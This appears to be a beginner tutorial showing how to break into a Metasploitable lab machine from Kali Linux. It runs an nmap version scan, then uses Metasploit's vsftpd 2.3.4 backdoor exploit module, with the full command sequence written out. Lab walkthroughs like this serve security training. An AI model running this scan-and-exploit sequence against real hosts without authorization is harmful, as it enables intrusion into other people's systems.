To perform to gain access to a webserver we need the following:
- Metasploit Server: The Target Machine.
- Kali Linux: The Attack Machine.
How to Gain access to a Server?
To Hack a Server we have to find out "Is there a Vulnerability in that machine?". You can think of that vulnerabilities as open doors to your system. Hackers leverage these open doors or vulnerabilities to gain access to any system.
After finding any vulnerability, then we perform Attack.
Steps to Gain Access
1. In this case, we are, of course, going to be attacking the Metasploit server, so make sure you start it up, check out the IP address of Metasploitable.In this case, my IP address is 192.168.43.13.
2. To find vulnerabilities, Open the terminal and run the following command:
mrdev@kali:~$ nmap -sV 192.168.43.13
It will take time and after that, it will show ports.
After the scan we found a Vulnerability i.e. vsftpd 2.3.4.
3. Now start the Metasploit framework.
mrdev@kali:~$ msfconsole
msf6 > search vsftpd
This module exploits a malicious backdoor that was added to the vsftpd download archive. This backdoor was introduced in the vsftpd-2.3.4.tar.gz archive between June 30th, 2011 and July 1st, 2011 according to the most recent information available. This backdoor was removed on July 3rd, 2011.
4. To gain access use the following command:
msf6 > use exploit/unix/ftp/vsftpd_234_backdoor
[*] No payload configured, defaulting to cmd/unix/interect
msf6 exploit(exploit/unix/ftp/vsftpd_234_backdoor) > show options
msf6 exploit(exploit/unix/ftp/vsftpd_234_backdoor) > set RHOSTS 192.168.43.13
RHOSTS => 192.168.43.13
msf6 exploit(exploit/unix/ftp/vsftpd_234_backdoor) > exploit